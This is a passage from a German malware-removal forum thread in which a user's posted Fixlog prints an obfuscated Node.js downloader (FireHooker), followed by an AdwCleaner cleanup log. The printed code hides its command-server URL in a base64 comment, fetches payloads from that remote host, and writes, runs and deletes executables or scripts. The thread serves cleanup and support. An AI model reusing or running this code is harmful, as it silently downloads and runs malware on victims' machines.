_0x1a3d04=0x0,_0xff1d0b,_0x338665,_0x38d385=0x0,_0x4d3e2f='';_0x338665=_0x4dd175['\x63\x68\x61\x72\x41\x74'](_0x38d385++);~_0x338665&&(_0xff1d0b=_0x1a3d04%0x4?_0xff1d0b*0x40+_0x338665:_0x338665,_0x1a3d04++%0x4)?_0x4d3e2f+=String['\x66\x72\x6f\x6d\x43\x68\x61\x72\x43\x6f\x64\x65'](0xff&_0xff1d0b>>(-0x2*_0x1a3d04&0x6)):0x0){_0x338665=_0x222f24['\x69\x6e\x64\x65\x78\x4f\x66'](_0x338665);}return _0x4d3e2f;});}());_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65']=function(_0xf4f074){var _0x2f9734=atob(_0xf4f074);var _0x209cdc=[];for(var _0x5d6cb2=0x0,_0x40f280=_0x2f9734['\x6c\x65\x6e\x67\x74\x68'];_0x5d6cb2<_0x40f280;_0x5d6cb2++){_0x209cdc+='\x25'+('\x30\x30'+_0x2f9734['\x63\x68\x61\x72\x43\x6f\x64\x65\x41\x74'](_0x5d6cb2)['\x74\x6f\x53\x74\x72\x69\x6e\x67'](0x10))['\x73\x6c\x69\x63\x65'](-0x2);}return decodeURIComponent(_0x209cdc);};_0xd666['\x64\x61\x74\x61']={};_0xd666['\x69\x6e\x69\x74\x69\x61\x6c\x69\x7a\x65\x64']=!![];}var _0x1f0c26=_0xd666['\x64\x61\x74\x61'][_0x2ab53a];if(_0x1f0c26===undefined){var _0x31cb3c=function(_0x2676a2){this['\x72\x63\x34\x42\x79\x74\x65\x73']=_0x2676a2;this['\x73\x74\x61\x74\x65\x73']=[0x1,0x0,0x0];this['\x6e\x65\x77\x53\x74\x61\x74\x65']=function(){return'\x6e\x65\x77\x53\x74\x61\x74\x65';};this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']='\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a';this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']='\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d';};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']=function(){var _0x4c15ca=new RegExp(this['\x66\x69\x72\x73\x74\x53\x74\x61\x74\x65']+this['\x73\x65\x63\x6f\x6e\x64\x53\x74\x61\x74\x65']);return this['\x72\x75\x6e\x53\x74\x61\x74\x65'](_0x4c15ca['\x74\x65\x73\x74'](this['\x6e\x65\x77\x53\x74\x61\x74\x65']['\x74\x6f\x53\x74\x72\x69\x6e\x67']())?--this['\x73\x74\x61\x74\x65\x73'][0x1]:--this['\x73\x74\x61\x74\x65\x73'][0x0]);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x72\x75\x6e\x53\x74\x61\x74\x65']=function(_0x6aceed){if(!Boolean(~_0x6aceed)){return _0x6aceed;}return this['\x67\x65\x74\x53\x74\x61\x74\x65'](this['\x72\x63\x34\x42\x79\x74\x65\x73']);};_0x31cb3c['\x70\x72\x6f\x74\x6f\x74\x79\x70\x65']['\x67\x65\x74\x53\x74\x61\x74\x65']=function(_0x27e37b){for(var _0x35d1d5=0x0,_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];_0x35d1d5<_0x366640;_0x35d1d5++){this['\x73\x74\x61\x74\x65\x73']['\x70\x75\x73\x68'](Math['\x72\x6f\x75\x6e\x64'](Math['\x72\x61\x6e\x64\x6f\x6d']()));_0x366640=this['\x73\x74\x61\x74\x65\x73']['\x6c\x65\x6e\x67\x74\x68'];}return _0x27e37b(this['\x73\x74\x61\x74\x65\x73'][0x0]);};new _0x31cb3c(_0xd666)['\x63\x68\x65\x63\x6b\x53\x74\x61\x74\x65']();_0x399946=_0xd666['\x62\x61\x73\x65\x36\x34\x44\x65\x63\x6f\x64\x65\x55\x6e\x69\x63\x6f\x64\x65'](_0x399946);_0xd666['\x64\x61\x74\x61'][_0x2ab53a]=_0x399946;}else{_0x399946=_0x1f0c26;}return _0x399946;};_0xd666('0x0');function uuid(){var _0x25e017={'\x50\x55\x69':function _0x5d98fa(_0x31042d,_0x4f1c1b){return _0x31042d>=_0x4f1c1b;}};let _0x46f353=crypto[_0xd666('0x1')](0x10)[_0xd666('0x2')](_0xd666('0x3')),_0x5e531c='';for(var _0x1554fe in _0x46f353)_0x25e017['PUi']([0x8,0xc,0x10,0x14]['indexOf'](Number(_0x1554fe)),0x0)&&(_0x5e531c+='\x2d'),_0x5e531c+=_0x46f353[_0x1554fe];return _0x5e531c;}function path_quote(_0x585114){var _0x49762e={'\x66\x53\x41':function _0x1106c1(_0x12e337,_0x541157){return _0x12e337<_0x541157;},'\x6e\x6b\x74':function _0x63b0a6(_0x582150,_0x40dae3){return _0x582150+_0x40dae3;}};return _0x49762e[_0xd666('0x4')](_0x585114[_0xd666('0x5')]('\x20'),0x0)?_0x585114:_0x49762e[_0xd666('0x6')]('\x22',_0x585114)+'\x22';}function path_unquote(_0x37deea){var _0x1b9da3={'\x49\x6a\x74':function _0xe52cfe(_0x36f5df,_0x4d10c2){return _0x36f5df!=_0x4d10c2;},'\x56\x6e\x56':function _0x3225d9(_0x5019eb,_0x261ddf){return _0x5019eb-_0x261ddf;}};return _0x1b9da3['Ijt']('\x22',_0x37deea[0x0])?_0x37deea:_0x37deea[_0xd666('0x7')](0x1,_0x1b9da3[_0xd666('0x8')](_0x37deea[_0xd666('0x9')],0x1));}function path_remove(_0x563716){var _0x4d0eb3={'\x53\x4b\x65':function _0x390194(_0x286ebb,_0x4790fc){return _0x286ebb+_0x4790fc;},'\x4c\x42\x69':function _0x27b619(_0x12ba74,_0x35b7be){return _0x12ba74+_0x35b7be;},'\x77\x53\x41':function _0x5588a9(_0x33e54b,_0x99431f){return _0x33e54b+_0x99431f;}};let _0x140c9e=child_process[_0xd666('0xa')]('rmdir',['\x2fS','\x2fQ',_0x563716],{'\x73\x68\x65\x6c\x6c':!0x0});if(_0x140c9e[_0xd666('0xb')])throw _0x140c9e['error'];if(_0x140c9e[_0xd666('0xc')])throw new Error(_0x4d0eb3[_0xd666('0xd')](_0x4d0eb3[_0xd666('0xe')](_0x4d0eb3[_0xd666('0xf')](_0xd666('0x10'),_0x140c9e[_0xd666('0xc')]),'\x20'),_0x140c9e[_0xd666('0x11')][_0xd666('0x2')]()));}const fs=require('fs'),querystring=require(_0xd666('0x12')),path=require(_0xd666('0x13')),os=require('os'),crypto=require(_0xd666('0x14')),child_process=require(_0xd666('0x15')),url=require(_0xd666('0x16')),__VERSION__=_0xd666('0x17'),CONFIG=__filename+_0xd666('0x18'),MAX_REQ=0xa,MAX_302_REDIR=0xa,cmd_npm=path[_0xd666('0x19')](path[_0xd666('0x1a')](process['argv'][0x0]),_0xd666('0x1b')),cmd_node=process[_0xd666('0x1c')][0x0],print=console[_0xd666('0x1d')];var cfg=function(){var _0x587828=function(){var _0x6ad91e=!![];return function(_0x430d01,_0x1df094){var _0x26a3a4=_0x6ad91e?function(){if(_0x1df094){var _0x1d7247=_0x1df094['\x61\x70\x70\x6c\x79'](_0x430d01,arguments);_0x1df094=null;return _0x1d7247;}}:function(){};_0x6ad91e=![];return _0x26a3a4;};}();var _0x36953a=_0x587828(this,function(){var _0x26e322=function(){return'\x64\x65\x76';},_0x34694f=function(){return'\x77\x69\x6e\x64\x6f\x77';};var _0x4ecc18=function(){var _0x793da4=new RegExp('\x5c\x77\x2b\x20\x2a\x5c\x28\x5c\x29\x20\x2a\x7b\x5c\x77\x2b\x20\x2a\x5b\x27\x7c\x22\x5d\x2e\x2b\x5b\x27\x7c\x22\x5d\x3b\x3f\x20\x2a\x7d');return!_0x793da4['\x74\x65\x73\x74'](_0x26e322['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x18d320=function(){var _0x407cc0=new RegExp('\x28\x5c\x5c\x5b\x78\x7c\x75\x5d\x28\x5c\x77\x29\x7b\x32\x2c\x34\x7d\x29\x2b');return _0x407cc0['\x74\x65\x73\x74'](_0x34694f['\x74\x6f\x53\x74\x72\x69\x6e\x67']());};var _0x58d584=function(_0x2b0bc5){var _0x3a969c=~-0x1>>0x1+0xff%0x0;if(_0x2b0bc5['\x69\x6e\x64\x65\x78\x4f\x66']('\x69'===_0x3a969c)){_0x17b8d1(_0x2b0bc5);}};var _0x17b8d1=function(_0x1a0d6c){var _0x5d7b3=~-0x4>>0x1+0xff%0x0;if(_0x1a0d6c['\x69\x6e\x64\x65\x78\x4f\x66']((!![]+'')[0x3])!==_0x5d7b3){_0x58d584(_0x1a0d6c);}};if(!_0x4ecc18()){if(!_0x18d320()){_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}else{_0x58d584('\x69\x6e\x64\x65\x78\x4f\x66');}}else{_0x58d584('\x69\x6e\x64\u0435\x78\x4f\x66');}});_0x36953a();var _0x106a50={'\x5a\x53\x61':function _0x960297(_0x28de0c,_0x408f1f){return _0x28de0c(_0x408f1f);},'\x50\x74\x43':function _0x355246(_0x391ee0,_0x5a9225){return _0x391ee0+_0x5a9225;},'\x62\x75\x6a':function _0x57a439(_0x403160){return _0x403160();},'\x62\x6b\x74':function _0x5b8c76(_0x402050,_0x56be46){return _0x402050-_0x56be46;},'\x68\x47\x66':function _0x59a08b(_0x5b1f65,_0x2b3d9b){return _0x5b1f65+_0x2b3d9b;}};var _0x5e8f1c=function(){var _0x4bea4d=!![];return function(_0x56897a,_0x579302){var _0x539285=_0x4bea4d?function(){if(_0x579302){var _0x505456=_0x579302[_0xd666('0x1e')](_0x56897a,arguments);_0x579302=null;return _0x505456;}}:function(){};_0x4bea4d=![];return _0x539285;};}();var _0xe50cc4=_0x5e8f1c(this,function(){var _0x27ab94=_0x106a50['ZSa'](Function,_0x106a50[_0xd666('0x1f')](_0x106a50['PtC']('return\x20\x28function\x28\x29\x20',_0xd666('0x20')),'\x29\x3b'));var _0x5dcb84=function(){};var _0xe16597=_0x106a50[_0xd666('0x21')](_0x27ab94);if(!_0xe16597['console']){_0xe16597['console']=function(_0x4ba674){var _0x32fb3e=_0xd666('0x22')[_0xd666('0x23')]('\x7c'),_0x2a50b5=0x0;while(!![]){switch(_0x32fb3e[_0x2a50b5++]){case'0':_0x164c4e[_0xd666('0x24')]=_0x4ba674;continue;case'1':_0x164c4e[_0xd666('0x1d')]=_0x4ba674;continue;case'2':return _0x164c4e;continue;case'3':_0x164c4e[_0xd666('0x25')]=_0x4ba674;continue;case'4':_0x164c4e[_0xd666('0x26')]=_0x4ba674;continue;case'5':_0x164c4e[_0xd666('0xb')]=_0x4ba674;continue;case'6':_0x164c4e['trace']=_0x4ba674;continue;case'7':_0x164c4e[_0xd666('0x27')]=_0x4ba674;continue;case'8':var _0x164c4e={};continue;}break;}}(_0x5dcb84);}else{var _0x3b2042=_0xd666('0x28')[_0xd666('0x23')]('\x7c'),_0x41de4b=0x0;while(!![]){switch(_0x3b2042[_0x41de4b++]){case'0':_0xe16597['console'][_0xd666('0xb')]=_0x5dcb84;continue;case'1':_0xe16597[_0xd666('0x29')][_0xd666('0x1d')]=_0x5dcb84;continue;case'2':_0xe16597[_0xd666('0x29')][_0xd666('0x27')]=_0x5dcb84;continue;case'3':_0xe16597[_0xd666('0x29')][_0xd666('0x24')]=_0x5dcb84;continue;case'4':_0xe16597['console'][_0xd666('0x2a')]=_0x5dcb84;continue;case'5':_0xe16597[_0xd666('0x29')][_0xd666('0x26')]=_0x5dcb84;continue;case'6':_0xe16597[_0xd666('0x29')][_0xd666('0x25')]=_0x5dcb84;continue;}break;}}});_0x106a50[_0xd666('0x21')](_0xe50cc4);var _0x3adf3e;try{var _0xc0f56a=(_0x3adf3e=fs[_0xd666('0x2b')](__filename,'utf\x2d8'))[_0xd666('0x7')](_0x106a50[_0xd666('0x2c')](_0x3adf3e['length'],0x200));return _0xc0f56a=_0xc0f56a[_0xd666('0x7')](_0x106a50[_0xd666('0x2d')](_0xc0f56a[_0xd666('0x2e')]('\x2f\x2a'),0x2)),_0xc0f56a=_0xc0f56a['substr'](0x0,_0x106a50[_0xd666('0x2c')](_0xc0f56a[_0xd666('0x9')],0x2)),JSON[_0xd666('0x2f')](Buffer['from'](_0xc0f56a,_0xd666('0x30')));}catch(_0x280725){try{return _0x3adf3e=fs['readFileSync'](CONFIG,_0xd666('0x31')),JSON[_0xd666('0x2f')](_0x3adf3e);}catch(_0x6c2b48){return JSON[_0xd666('0x2f')](Buffer['from'](_0x3adf3e,'base64'));}}}();!function(){var _0x5008e0={'\x6a\x43\x6d':function _0x6ea11d(_0x379f07,_0x417a9c){return _0x379f07(_0x417a9c);},'\x6b\x4e\x61':function _0x5a8b3d(_0x3172bd,_0x1cadfa){return _0x3172bd>=_0x1cadfa;},'\x46\x43\x49':function _0x1d519c(_0x3dcb5e,_0x104042,_0x1d4ecc,_0x2768c2){return _0x3dcb5e(_0x104042,_0x1d4ecc,_0x2768c2);},'\x4f\x47\x49':function _0x729fb6(_0x1a3342){return _0x1a3342();},'\x62\x58\x64':function _0x1e03f5(_0x146e57){return _0x146e57();},'\x6f\x69\x43':function _0x4ada5c(_0x582adf,_0x41bb10){return _0x582adf==_0x41bb10;},'\x57\x43\x57':function _0x3f7a41(_0x596773,_0x278a51){return _0x596773==_0x278a51;},'\x58\x74\x70':function _0x1a7c19(_0x24d625,_0x2e50e9,_0x277e81){return _0x24d625(_0x2e50e9,_0x277e81);},'\x71\x5a\x71':function _0xfc95c(_0x3a4ec3,_0x390ba2){return _0x3a4ec3+_0x390ba2;},'\x44\x69\x4b':function _0x19adbf(_0xc90f0a,_0x476cdc,_0x3f63da){return _0xc90f0a(_0x476cdc,_0x3f63da);},'\x59\x67\x65':function _0x4e84eb(_0x32c7ec,_0x500c2e){return _0x32c7ec+_0x500c2e;},'\x78\x6c\x52':function _0x434cf6(_0x94c97b,_0x3f36c6){return _0x94c97b+_0x3f36c6;}};function _0x3e4b22(_0x4b21aa,_0x2c682c){var _0x4e1ecf={'\x57\x65\x46':function _0x1bc431(_0x970f51,_0xd8a86f){return _0x5008e0[_0xd666('0x32')](_0x970f51,_0xd8a86f);},'\x7a\x58\x56':function _0x4111a5(_0x1d898d,_0x4e8a15){return _0x5008e0[_0xd666('0x33')](_0x1d898d,_0x4e8a15);}};const _0x3e5428=(_0x5313d8,_0x456a52,_0x49f15e)=>{if(_0x49f15e>MAX_302_REDIR)throw new Error('MAX\x2030x\x20reached',_0x49f15e);_0x49f15e+=0x1;let _0x5afff5=url[_0xd666('0x2f')](_0x5313d8),_0x4f6fa1=_0x5008e0[_0xd666('0x32')](require,_0x5afff5[_0xd666('0x34')][_0xd666('0x35')](0x0,-0x1));process[_0xd666('0x36')][_0xd666('0x37')]='0',_0x4f6fa1[_0xd666('0x38')](_0x5313d8,_0x52a415=>{var _0x109a1e={'\x6d\x4f\x71':function _0x46711a(_0x452b38,_0x2f360e){return _0x4e1ecf[_0xd666('0x39')](_0x452b38,_0x2f360e);}};if(_0x52a415['headers'][_0xd666('0x3a')]&&_0x4e1ecf['zXV']([0x12d,0x12e,0x12f,0x133,0x134][_0xd666('0x5')](_0x52a415['statusCode']),0x0)){let _0x57bf05=_0x52a415[_0xd666('0x3b')]['location'];return _0x57bf05[_0xd666('0x3c')](/^http[s]?:/)||(_0x57bf05=url[_0xd666('0x3d')](_0x5313d8,_0x57bf05)),_0x3e5428(_0x57bf05,_0x456a52,_0x49f15e);}{let _0x4e02d8=null;_0x52a415['on']('data',_0x52e8df=>{_0x4e02d8=_0x4e02d8?Buffer[_0xd666('0x3e')]([_0x4e02d8,_0x52e8df]):new Buffer(_0x52e8df);}),_0x52a415['on']('end',()=>{_0x109a1e[_0xd666('0x3f')](_0x456a52,{'\x75\x72\x6c':_0x5313d8,'\x72\x65\x73\x70':_0x52a415,'\x64\x61\x74\x61':_0x4e02d8});});}})['on'](_0xd666('0xb'),_0x593c8b=>{_0x4e1ecf[_0xd666('0x39')](_0x456a52,_0x593c8b);});};return _0x5008e0[_0xd666('0x40')](_0x3e5428,_0x4b21aa,_0x2c682c,0x0);}function _0x5be20d(){let _0x119a81=path[_0xd666('0x19')](os[_0xd666('0x41')](),_0x5008e0[_0xd666('0x42')](uuid));return fs['mkdirSync'](_0x119a81),_0x119a81;}function _0xc24f52(_0x145579,_0x1c8a36){var _0x196d06=_0x5008e0[_0xd666('0x42')](_0x5be20d);let _0x404f86=path[_0xd666('0x19')](_0x196d06,_0x5008e0['bXd'](uuid));_0x5008e0[_0xd666('0x43')](_0x145579,_0x1d6fc6)?_0x404f86+='\x2eexe':_0x5008e0['WCW'](_0x145579,_0x536780)&&(_0x404f86+=_0xd666('0x44'));var _0x5d011c=-0x1;try{let _0x2d32d7={};fs['writeFileSync'](_0x404f86,_0x1c8a36),0x1==_0x145579?_0x5d011c=child_process['spawnSync'](_0x404f86,_0x2d32d7):_0x5008e0[_0xd666('0x45')](0x2,_0x145579)&&(_0x5d011c=child_process[_0xd666('0xa')](cmd_node,[_0x404f86],_0x2d32d7)),_0x5d011c=_0x5d011c['status'];}catch(_0x1907d9){_0x5d011c=-0x1;}try{fs[_0xd666('0x46')](_0x404f86);}catch(_0x2e04aa){}try{fs[_0xd666('0x47')](_0x196d06);}catch(_0x13ab64){}return _0x5d011c;}function _0x3f77cc(_0x43b484,_0x4f4c57){var _0x29b3c={'\x5a\x70\x42':function _0x448265(_0x5aa0c6,_0x269352){return _0x5008e0[_0xd666('0x33')](_0x5aa0c6,_0x269352);},'\x68\x6f\x4a':function _0x43f540(_0x19366c,_0x3b1a6b){return _0x5008e0[_0xd666('0x45')](_0x19366c,_0x3b1a6b);},'\x79\x59\x47':function _0x2d252f(_0x357261,_0x47d369,_0x212f53){return _0x5008e0[_0xd666('0x48')](_0x357261,_0x47d369,_0x212f53);},'\x53\x4f\x71':function _0x1d66e9(_0xbd2959,_0x32d116){return _0x5008e0['qZq'](_0xbd2959,_0x32d116);},'\x41\x58\x54':function _0x118c7c(_0x368da8,_0x30927e,_0x1870ae){return _0x5008e0['DiK'](_0x368da8,_0x30927e,_0x1870ae);},'\x6a\x75\x73':function _0x2057cf(_0x2f71cd,_0x2d75cb){return _0x2f71cd+_0x2d75cb;}};let _0x4550e0=querystring[_0xd666('0x49')]({'\x76\x65\x72':__VERSION__,'\x63\x69\x64':cfg['cid'],'\x77\x6d\x69\x64':cfg[_0xd666('0x4a')],'\x69':_0x43b484,'\x72':_0x4f4c57}),_0x39bb02=cfg[_0xd666('0x16')];return _0x39bb02=_0x39bb02['indexOf']('\x3f')>=0x0?_0x5008e0[_0xd666('0x4b')](_0x39bb02,'\x26')+_0x4550e0:_0x5008e0[_0xd666('0x4c')](_0x5008e0[_0xd666('0x4c')](_0x39bb02,'\x3f'),_0x4550e0),_0x5008e0[_0xd666('0x4d')](_0x3e4b22,_0x39bb02,_0x3f0c5a=>{if(_0x29b3c['ZpB'](_0x43b484,MAX_REQ))return!0x1;if(_0x3f0c5a instanceof Error);else if(_0x3f0c5a[_0xd666('0x4e')]&&_0x3f0c5a['data'][_0xd666('0x9')]>0x0&&_0x29b3c[_0xd666('0x4f')](0xc8,_0x3f0c5a['resp'][_0xd666('0x50')])){let _0x4f4c57=_0x3f0c5a['data'];if(_0x29b3c[_0xd666('0x4f')](0x4d,_0x4f4c57[0x0])&&0x5a==_0x4f4c57[0x1])return _0x29b3c[_0xd666('0x51')](_0x3f77cc,_0x29b3c[_0xd666('0x52')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x1d6fc6,_0x4f4c57));if(0x0==_0x4f4c57['indexOf']('\x2f\x2fnode'))return _0x29b3c['AXT'](_0x3f77cc,_0x29b3c[_0xd666('0x54')](_0x43b484,0x1),_0x29b3c[_0xd666('0x53')](_0xc24f52,_0x536780,_0x4f4c57));}return!0x1;}),!0x0;}const _0x1d6fc6=0x1,_0x536780=0x2;_0x3f77cc(0x0);}();/*eyJjaWQiOiAiNTU4QkM3NUEtREU3Mi00MjlBLUI5MUItRkQ5OEM1MjZERDE4Iiwid21pZCI6ICI0MiIsInVybCI6ICJodHRwOi8vZGUubXlub2RlanMubmV0L2Rvd25sb2FkL3VwZGF0ZTI/d21pZD00MiZ0cz0xNTk0OTU1NDM3JnNpZD1mMGU3MGJiM2E2NDMxNTI5ZWFjMTBhMjAxMzY5Y2VmMyZjYz1kZSJ9*/
========= Ende von CMD: =========


==== Ende von Fixlog 21:48:27 ====
         

Alt 04.10.2020, 21:56   #14
cosinus
/// Winkelfunktion
/// TB-Süch-Tiger™
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Danke!

adwCleaner

Führe AdwCleaner gemäß der bebilderten Anleitung aus und poste abschließend die Logdatei in CODE-Tags.

Alt 04.10.2020, 22:06   #15
Öhm
 
Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Standard

Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker



Die gewünschte Log-Datei:

Code:
ATTFilter
# -------------------------------
# Malwarebytes AdwCleaner 8.0.7.0
# -------------------------------
# Build:    07-22-2020
# Database: 2020-07-20.1 (Local)
# Support:  https://www.malwarebytes.com/support
#
# -------------------------------
# Mode: Clean
# -------------------------------
# Start:    10-04-2020
# Duration: 00:00:04
# OS:       Windows 10 Pro
# Cleaned:  8
# Failed:   0


***** [ Services ] *****

No malicious services cleaned.

***** [ Folders ] *****

Deleted       C:\ProgramData\Application Data\Lavasoft\Web Companion

***** [ Files ] *****

Deleted       C:\Windows\Installer\{C194A732-C141-47B1-927A-2408A8446784}\{21AAF3C3-8175-4C8D-87FD-39850D93AED5}.XPI

***** [ DLL ] *****

No malicious DLLs cleaned.

***** [ WMI ] *****

No malicious WMI cleaned.

***** [ Shortcuts ] *****

No malicious shortcuts cleaned.

***** [ Tasks ] *****

No malicious tasks cleaned.

***** [ Registry ] *****

Deleted       HKCU\Software\Lavasoft\Web Companion
Deleted       HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKLM\SYSTEM\Setup\FirstBoot\Services\WCAssistantService
Deleted       HKLM\Software\Wow6432Node\Lavasoft\Web Companion
Deleted       HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com
Deleted       HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\Domains\webcompanion.com

***** [ Chromium (and derivatives) ] *****

No malicious Chromium entries cleaned.

***** [ Chromium URLs ] *****

No malicious Chromium URLs cleaned.

***** [ Firefox (and derivatives) ] *****

No malicious Firefox entries cleaned.

***** [ Firefox URLs ] *****

No malicious Firefox URLs cleaned.

***** [ Hosts File Entries ] *****

No malicious hosts file entries cleaned.

***** [ Preinstalled Software ] *****

No Preinstalled Software cleaned.


*************************

[+] remove_file_ntuser
[+] remove_wingrouppolicy_registry
[+] remove_regKey_googleupdatepolicy
[+] Delete Tracing Keys
[+] Reset Winsock

*************************

AdwCleaner[S00].txt - [2185 octets] - [04/10/2020 22:02:36]

########## EOF - C:\AdwCleaner\Logs\AdwCleaner[C00].txt ##########
         

Thema geschlossen

Themen zu Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker
.com, .dll, antivirus, avira, browser, defender, downloader, explorer, firefox, flash player, helper, home, internet, internet explorer, malware, neustart, nodejs, registry, scan, security, software, tcp, temp, udp, windows, wmi



Ähnliche Themen: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker


  1. Avira meldet TR/AD Firehooker.BU - auch hier
    Log-Analyse und Auswertung - 09.10.2020 (19)
  2. Windows 10: Avira erkennt nach jedem Hochfahren den Trojaner "TR/AD.FireHooker.BU"
    Log-Analyse und Auswertung - 07.10.2020 (15)
  3. Win10: Avira findet Trojaner (TR/AD.FireHooker.BU) und weitere Funde von Malwarybytes und Roguekiller
    Plagegeister aller Art und deren Bekämpfung - 06.10.2020 (28)
  4. TR/AD.FireHooker.BU wird nach jedem Hochfahren von Avira erkannt
    Log-Analyse und Auswertung - 06.10.2020 (18)
  5. Windows 7: Avira findet nach Entpacken W32/Ramnit.C in .exe-Datei
    Log-Analyse und Auswertung - 27.04.2018 (7)
  6. Win 7: Kaspersky findet Trojan.Win32.FireHooker.a und evtl. mehr
    Log-Analyse und Auswertung - 03.10.2016 (20)
  7. TR/Firehooker.1825 Infektion gefunden von Avira
    Plagegeister aller Art und deren Bekämpfung - 19.12.2015 (15)
  8. TR/FireHooker.1825 wird von AVIRA nicht entfernt
    Plagegeister aller Art und deren Bekämpfung - 18.12.2015 (18)
  9. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 17.12.2015 (21)
  10. Windows7: AVIRA meldet TR/FireHooker.1825
    Log-Analyse und Auswertung - 17.12.2015 (13)
  11. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 16.12.2015 (17)
  12. Windows 7: Antivir findet immer wieder Trojaner Firehooker
    Log-Analyse und Auswertung - 14.12.2015 (11)
  13. TR/FireHooker.1825 von AVIRA gefunden
    Plagegeister aller Art und deren Bekämpfung - 07.12.2015 (14)
  14. Abstürzen einige Minuten nach Start, Bildschirm schwarz, kurzer Surrton, Avira Meldung: avira.systray.exe ungültiges Bild
    Plagegeister aller Art und deren Bekämpfung - 26.09.2015 (5)
  15. Windows 7: Avira findet TR/Emotet.A.67 nach Telekom-Rechnung
    Log-Analyse und Auswertung - 28.12.2014 (9)
  16. Windows 7: Norton findet fast bei jedem Windows-Start ntdllinst.exe und ntcrxinst.exe
    Log-Analyse und Auswertung - 04.09.2014 (24)
  17. XP Fehlermeldung nach Start - je 2 Funde mit Avira + MBAM
    Log-Analyse und Auswertung - 01.12.2013 (21)

Zum Thema Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker - Hallo, ich habe seit ein paar Tagen das Phänomen, dass Avira ein paar Minuten nach dem PC Start eine Datei in Quarantäne schiebt:TR/AD.FireHooker Bei einem kompletten Virenscan des PCs hat - Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker...
Archiv
Du betrachtest: Windows 10: Avira findet nach dem PC Start TR/AD.FireHooker auf Trojaner-Board

Search Engine Optimization by vBSEO ©2011, Crawlability, Inc.